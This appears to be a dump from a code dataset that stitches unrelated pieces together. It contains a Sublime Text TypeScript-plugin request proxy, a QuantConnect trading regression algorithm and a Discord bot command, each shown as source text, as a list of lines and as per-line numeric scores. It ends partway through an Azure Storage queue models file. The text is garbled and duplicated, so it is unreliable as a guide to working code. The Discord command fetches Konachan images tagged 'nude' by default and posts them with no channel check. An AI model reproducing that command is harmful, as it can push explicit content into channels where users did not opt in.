self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def quick_info(self, path, location=Location(1, 1), on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("quickinfo", args) json_str = json_helpers.encode(req_dict) callback = on_completed or (lambda: None) if not IS_ST2: self.__comm.sendCmdAsync( json_str, callback, req_dict["seq"] ) else: self.__comm.sendCmd( json_str, callback, req_dict["seq"] ) def quick_info_full(self, path, location=Location(1, 1), on_completed=None): args = {"file": path, "line": location.line, "offset": location.offset} req_dict = self.create_req_dict("quickinfo-full", args) json_str = json_helpers.encode(req_dict) callback = on_completed or (lambda: None) if not IS_ST2: self.__comm.sendCmdAsync( json_str, callback, req_dict["seq"] ) else: self.__comm.sendCmd( json_str, callback, req_dict["seq"] ) def save_to(self, path, alternatePath): args = {"file": path, "tmpfile": alternatePath} req_dict = self.create_req_dict("saveto", args) json_str = json_helpers.encode(req_dict) self.__comm.postCmd(json_str) def nav_to(self, search_text, file_name): args = {"searchValue": search_text, "file": file_name, "maxResultCount": 20} req_dict = self.create_req_dict("navto", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def project_info(self, file_name, need_file_name_list=False): args = {"file": file_name, "needFileNameList": need_file_name_list} req_dict = self.create_req_dict("projectInfo", args) json_str = json_helpers.encode(req_dict) return self.__comm.sendCmdSync(json_str, req_dict["seq"]) def async_document_highlights(self, path, location, on_completed=None): args = {"line": location.line, "offset": location.offset, "file": path, "filesToSearch": [path]} req_dict = self.create_req_dict("documentHighlights", args) json_str = json_helpers.encode(req_dict) 
self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def add_event_handler(self, event_name, cb): self.__comm.add_event_handler(event_name, cb) def add_event_handler_for_worker(self, event_name, cb): self.__worker_comm.add_event_handler(event_name, cb) def create_req_dict(self, command_name, args=None): req_dict = { "command": command_name, "seq": self.increase_seq(), "type": "request" } if args: req_dict["arguments"] = args return req_dict def get_semantic_errors(self, path): args = { "file": path } req_dict = self.create_req_dict("semanticDiagnosticsSync", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def get_syntactic_errors(self, path): args = { "file": path } req_dict = self.create_req_dict("syntacticDiagnosticsSync", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def get_code_fixes(self, path, startLine, startOffset, endLine, endOffset, errorCodes): args = { "file": path, "startLine": startLine, "startOffset": startOffset, "endLine": endLine, "endOffset": endOffset, "errorCodes": errorCodes } req_dict = self.create_req_dict("getCodeFixes", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict
[ "import sublime\n", "\n", "from . import json_helpers\n", "from .global_vars import IS_ST2\n", "from .node_client import CommClient\n", "from .text_helpers import Location\n", "\n", "\n", "class ServiceProxy:\n", " def __init__(self, worker_client=CommClient(), server_client=CommClient()):\n", " self.__comm = server_client\n", " self.__worker_comm = worker_client\n", " self.seq = 1\n", "\n", " def increase_seq(self):\n", " temp = self.seq\n", " self.seq += 1\n", " return temp\n", "\n", " def exit(self):\n", " req_dict = self.create_req_dict(\"exit\")\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def stop_worker(self):\n", " req_dict = self.create_req_dict(\"exit\")\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def configure(self, host_info=\"Sublime Text\", file=None, format_options=None):\n", " args = {\"hostInfo\": host_info, \"formatOptions\": format_options, \"file\": file}\n", " req_dict = self.create_req_dict(\"configure\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " self.set_inferred_project_compiler_options()\n", "\n", " def set_inferred_project_compiler_options(self):\n", " \"\"\" Add full type support for compilers running in file scope mode \"\"\"\n", " compiler_options = {\n", " \"target\": \"ESNext\", # enable all es-next features\n", " \"allowJs\": True, # enable javascript support\n", " \"jsx\": \"Preserve\", # enable jsx support\n", " \"noEmit\": True # do not emit outputs\n", " }\n", " args = { \"options\": compiler_options }\n", " req_dict = self.create_req_dict(\"compilerOptionsForInferredProjects\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " 
self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def change(self, path, begin_location=Location(1, 1), end_location=Location(1, 1), insertString=\"\"):\n", " args = {\n", " \"file\": path,\n", " \"line\": begin_location.line,\n", " \"offset\": begin_location.offset,\n", " \"endLine\": end_location.line,\n", " \"endOffset\": end_location.offset,\n", " \"insertString\": insertString\n", " }\n", " req_dict = self.create_req_dict(\"change\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def completions(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"completions\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmd(\n", " json_str,\n", " lambda response_dict: None if on_completed is None else on_completed(response_dict),\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def async_completions(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"completions\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def signature_help(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"signatureHelp\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmd(\n", " json_str,\n", " lambda response_dict: None if on_completed is None else 
on_completed(response_dict),\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def async_signature_help(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"signatureHelp\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def definition(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"definition\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def type_definition(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"typeDefinition\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def format(self, path, begin_location=Location(1, 1), end_location=Location(1, 1)):\n", " args = {\n", " \"file\": path,\n", " \"line\": begin_location.line,\n", " \"offset\": begin_location.offset,\n", " \"endLine\": end_location.line,\n", " \"endOffset\": end_location.offset\n", " }\n", " req_dict = self.create_req_dict(\"format\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def format_on_key(self, path, location=Location(1, 1), key=\"\"):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"key\": key}\n", " req_dict = 
self.create_req_dict(\"formatonkey\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def organize_imports(self, path):\n", " args = {\n", " \"scope\": {\n", " \"type\": \"file\",\n", " \"args\": {\n", " \"file\": path\n", " }\n", " },\n", " }\n", " req_dict = self.create_req_dict(\"organizeImports\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def open(self, path):\n", " args = {\"file\": path}\n", " req_dict = self.create_req_dict(\"open\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def open_on_worker(self, path):\n", " args = {\"file\": path}\n", " req_dict = self.create_req_dict(\"open\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def close(self, path):\n", " args = {\"file\": path}\n", " req_dict = self.create_req_dict(\"close\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def references(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"references\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def reload(self, 
path, alternate_path):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def reload_on_worker(self, path, alternate_path):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " response_dict = self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def reload_async(self, path, alternate_path, on_completed):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdAsync(json_str, None, req_dict[\"seq\"])\n", "\n", " def reload_async_on_worker(self, path, alternate_path, on_completed):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdAsync(json_str, None, req_dict[\"seq\"])\n", "\n", " def rename(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"rename\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", 
"\n", " def get_applicable_refactors_async(self, path, start_loc, end_loc, on_completed):\n", " args = {\n", " \"file\": path,\n", " \"startLine\": start_loc.line,\n", " \"startOffset\": start_loc.offset,\n", " \"endLine\": end_loc.line,\n", " \"endOffset\": end_loc.offset,\n", " }\n", " req_dict = self.create_req_dict(\"getApplicableRefactors\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def get_edits_for_refactor_async(self, path, refactor_name, action_name, start_loc, end_loc, on_completed):\n", " args = {\n", " \"file\": path,\n", " \"startLine\": start_loc.line,\n", " \"startOffset\": start_loc.offset,\n", " \"endLine\": end_loc.line,\n", " \"endOffset\": end_loc.offset,\n", " \"refactor\": refactor_name,\n", " \"action\": action_name,\n", " }\n", " req_dict = self.create_req_dict(\"getEditsForRefactor\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", " #on_completed(response_dict)\n", " #return response_dict\n", "\n", "\n", " def request_get_err(self, delay=0, pathList=[]):\n", " args = {\"files\": pathList, \"delay\": delay}\n", " req_dict = self.create_req_dict(\"geterr\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", "\n", " def request_get_err_for_project(self, delay=0, path=\"\"):\n", " args = {\"file\": path, \"delay\": delay}\n", " req_dict = self.create_req_dict(\"geterrForProject\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def type(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"type\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, 
req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def quick_info(self, path, location=Location(1, 1), on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"quickinfo\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " callback = on_completed or (lambda: None)\n", " if not IS_ST2:\n", " self.__comm.sendCmdAsync(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", " else:\n", " self.__comm.sendCmd(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def quick_info_full(self, path, location=Location(1, 1), on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"quickinfo-full\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " callback = on_completed or (lambda: None)\n", " if not IS_ST2:\n", " self.__comm.sendCmdAsync(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", " else:\n", " self.__comm.sendCmd(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def save_to(self, path, alternatePath):\n", " args = {\"file\": path, \"tmpfile\": alternatePath}\n", " req_dict = self.create_req_dict(\"saveto\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", "\n", " def nav_to(self, search_text, file_name):\n", " args = {\"searchValue\": search_text, \"file\": file_name, \"maxResultCount\": 20}\n", " req_dict = self.create_req_dict(\"navto\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def project_info(self, file_name, need_file_name_list=False):\n", " args = {\"file\": file_name, \"needFileNameList\": need_file_name_list}\n", " req_dict = self.create_req_dict(\"projectInfo\", args)\n", " json_str = json_helpers.encode(req_dict)\n", 
" return self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", "\n", " def async_document_highlights(self, path, location, on_completed=None):\n", " args = {\"line\": location.line, \"offset\": location.offset, \"file\": path, \"filesToSearch\": [path]}\n", " req_dict = self.create_req_dict(\"documentHighlights\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def add_event_handler(self, event_name, cb):\n", " self.__comm.add_event_handler(event_name, cb)\n", "\n", " def add_event_handler_for_worker(self, event_name, cb):\n", " self.__worker_comm.add_event_handler(event_name, cb)\n", "\n", " def create_req_dict(self, command_name, args=None):\n", " req_dict = {\n", " \"command\": command_name,\n", " \"seq\": self.increase_seq(),\n", " \"type\": \"request\"\n", " }\n", " if args:\n", " req_dict[\"arguments\"] = args\n", " return req_dict\n", "\n", " def get_semantic_errors(self, path):\n", " args = {\n", " \"file\": path\n", " }\n", " req_dict = self.create_req_dict(\"semanticDiagnosticsSync\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def get_syntactic_errors(self, path):\n", " args = {\n", " \"file\": path\n", " }\n", " req_dict = self.create_req_dict(\"syntacticDiagnosticsSync\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def get_code_fixes(self, path, startLine, startOffset, endLine, endOffset, errorCodes):\n", " args = {\n", " \"file\": path,\n", " \"startLine\": startLine,\n", " \"startOffset\": startOffset,\n", " \"endLine\": endLine,\n", " \"endOffset\": endOffset,\n", " \"errorCodes\": errorCodes\n", " }\n", " req_dict = self.create_req_dict(\"getCodeFixes\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " 
response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0, 0, 0, 0, 0.0425531914893617, 0.011904761904761904, 0, 0, 0, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0.01020408163265306, 0, 0, 0, 0, 0.010309278350515464, 0, 0, 0, 0.010638297872340425, 0.01020408163265306, 0, 0, 0, 0, 0.01098901098901099, 0.01020408163265306, 0, 0, 0, 0, 0.010309278350515464, 0, 0, 0, 0.010309278350515464, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008928571428571428, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0.02702702702702703, 0.03333333333333333, 0, 0, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
386
0.001031
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Common") AddReference("QuantConnect.Algorithm") from System import * from QuantConnect import * from QuantConnect.Orders import OrderStatus from QuantConnect.Algorithm import QCAlgorithm class AddRemoveSecurityRegressionAlgorithm(QCAlgorithm): '''Basic template algorithm simply initializes the date range and cash''' def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' self.SetStartDate(2013,10,07) #Set Start Date self.SetEndDate(2013,10,11) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data self.AddEquity("SPY") self._lastAction = None def OnData(self, data): '''OnData event is the primary entry point for your algorithm. 
Each new data point will be pumped in here.''' if self._lastAction is not None and self._lastAction.date() == self.Time.date(): return if not self.Portfolio.Invested: self.SetHoldings("SPY", .5) self._lastAction = self.Time if self.Time.weekday() == 1: self.AddEquity("AIG") self.AddEquity("BAC") self._lastAction = self.Time if self.Time.weekday() == 2: self.SetHoldings("AIG", .25) self.SetHoldings("BAC", .25) self._lastAction = self.Time if self.Time.weekday() == 3: self.RemoveSecurity("AIG") self.RemoveSecurity("BAC") self._lastAction = self.Time def OnOrderEvent(self, orderEvent): if orderEvent.Status == OrderStatus.Submitted: self.Debug("{0}: Submitted: {1}".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId))) if orderEvent.Status == OrderStatus.Filled: self.Debug("{0}: Filled: {1}".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId)))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "# \n", "# Licensed under the Apache License, Version 2.0 (the \"License\"); \n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "# \n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Common\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Orders import OrderStatus\n", "from QuantConnect.Algorithm import QCAlgorithm\n", "\n", "class AddRemoveSecurityRegressionAlgorithm(QCAlgorithm):\n", " '''Basic template algorithm simply initializes the date range and cash'''\n", "\n", " def Initialize(self):\n", " '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''\n", " \n", " self.SetStartDate(2013,10,07) #Set Start Date\n", " self.SetEndDate(2013,10,11) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", " # Find more symbols here: http://quantconnect.com/data\n", " self.AddEquity(\"SPY\")\n", " \n", " self._lastAction = None\n", "\n", "\n", " def OnData(self, data):\n", " '''OnData event is the primary entry point for your algorithm. 
Each new data point will be pumped in here.'''\n", " if self._lastAction is not None and self._lastAction.date() == self.Time.date():\n", " return\n", "\n", " if not self.Portfolio.Invested:\n", " self.SetHoldings(\"SPY\", .5)\n", " self._lastAction = self.Time\n", "\n", " if self.Time.weekday() == 1:\n", " self.AddEquity(\"AIG\")\n", " self.AddEquity(\"BAC\")\n", " self._lastAction = self.Time\n", "\n", " if self.Time.weekday() == 2:\n", " self.SetHoldings(\"AIG\", .25)\n", " self.SetHoldings(\"BAC\", .25)\n", " self._lastAction = self.Time\n", "\n", " if self.Time.weekday() == 3:\n", " self.RemoveSecurity(\"AIG\")\n", " self.RemoveSecurity(\"BAC\")\n", " self._lastAction = self.Time\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " if orderEvent.Status == OrderStatus.Submitted:\n", " self.Debug(\"{0}: Submitted: {1}\".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId)))\n", " if orderEvent.Status == OrderStatus.Filled:\n", " self.Debug(\"{0}: Filled: {1}\".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId)))" ]
[ 0, 0.012345679012345678, 0.3333333333333333, 0.014925373134328358, 0, 0.011764705882352941, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.022727272727272728, 0.02127659574468085, 0, 0.017543859649122806, 0, 0, 0, 0.006578947368421052, 0.1111111111111111, 0.05454545454545454, 0.05660377358490566, 0.017241379310344827, 0, 0, 0.1111111111111111, 0, 0, 0, 0.03571428571428571, 0.00847457627118644, 0.011235955056179775, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008620689655172414, 0, 0.017857142857142856 ]
67
0.019269
false
import json import secrets import aiohttp import discord async def konachan(cmd, message, args): url_base = 'https://konachan.com/post.json?limit=100&tags=' if not args: tags = 'nude' else: tags = '+'.join(args) url = url_base + tags async with aiohttp.ClientSession() as session: async with session.get(url) as data: data = await data.read() data = json.loads(data) if len(data) == 0: embed = discord.Embed(color=0x696969, title='🔍 No results.') else: post = secrets.choice(data) image_url = f'https:{post["file_url"]}' post_url = f'http://konachan.com/post/show/{post["id"]}' icon_url = 'https://i.imgur.com/qc4awFL.png' embed = discord.Embed(color=0x473a47) embed.set_author(name='Konachan', url=post_url, icon_url=icon_url) embed.set_image(url=image_url) embed.set_footer( text=f'Score: {post["score"]} | Size: {post["width"]}x{post["height"]} | Uploaded By: {post["author"]}') await message.channel.send(None, embed=embed)
[ "import json\n", "import secrets\n", "\n", "import aiohttp\n", "import discord\n", "\n", "\n", "async def konachan(cmd, message, args):\n", " url_base = 'https://konachan.com/post.json?limit=100&tags='\n", " if not args:\n", " tags = 'nude'\n", " else:\n", " tags = '+'.join(args)\n", " url = url_base + tags\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(url) as data:\n", " data = await data.read()\n", " data = json.loads(data)\n", " if len(data) == 0:\n", " embed = discord.Embed(color=0x696969, title='🔍 No results.')\n", " else:\n", " post = secrets.choice(data)\n", " image_url = f'https:{post[\"file_url\"]}'\n", " post_url = f'http://konachan.com/post/show/{post[\"id\"]}'\n", " icon_url = 'https://i.imgur.com/qc4awFL.png'\n", " embed = discord.Embed(color=0x473a47)\n", " embed.set_author(name='Konachan', url=post_url, icon_url=icon_url)\n", " embed.set_image(url=image_url)\n", " embed.set_footer(\n", " text=f'Score: {post[\"score\"]} | Size: {post[\"width\"]}x{post[\"height\"]} | Uploaded By: {post[\"author\"]}')\n", " await message.channel.send(None, embed=embed)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008547008547008548, 0 ]
31
0.000276
false
#------------------------------------------------------------------------- # Copyright (c) Microsoft. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #-------------------------------------------------------------------------- from xml.sax.saxutils import escape as xml_escape from xml.sax.saxutils import unescape as xml_unescape from base64 import ( b64encode, b64decode, ) from ._error import ( _validate_message_type_bytes, _validate_message_type_text, _ERROR_MESSAGE_NOT_BASE64, ) class Queue(object): ''' Queue class. :ivar str name: The name of the queue. :ivar metadata: A dict containing name-value pairs associated with the queue as metadata. This var is set to None unless the include=metadata param was included for the list queues operation. If this parameter was specified but the queue has no metadata, metadata will be set to an empty dictionary. :vartype metadata: dict mapping str to str ''' def __init__(self): self.name = None self.metadata = None class QueueMessage(object): ''' Queue message class. :ivar str id: A GUID value assigned to the message by the Queue service that identifies the message in the queue. This value may be used together with the value of pop_receipt to delete a message from the queue after it has been retrieved with the get messages operation. :ivar date insertion_time: A UTC date value representing the time the messages was inserted. :ivar date expiration_time: A UTC date value representing the time the message expires. 
:ivar int dequeue_count: Begins with a value of 1 the first time the message is dequeued. This value is incremented each time the message is subsequently dequeued. :ivar obj content: The message content. Type is determined by the decode_function set on the service. Default is str. :ivar str pop_receipt: A receipt str which can be used together with the message_id element to delete a message from the queue after it has been retrieved with the get messages operation. Only returned by get messages operations. Set to None for peek messages. :ivar date time_next_visible: A UTC date value representing the time the message will next be visible. Only returned by get messages operations. Set to None for peek messages. ''' def __init__(self): self.id = None self.insertion_time = None self.expiration_time = None self.dequeue_count = None self.content = None self.pop_receipt = None self.time_next_visible = None class QueueMessageFormat: ''' Encoding and decoding methods which can be used to modify how the queue service encodes and decodes queue messages. Set these to queueservice.encode_function and queueservice.decode_function to modify the behavior. The defaults are text_xmlencode and text_xmldecode, respectively. ''' 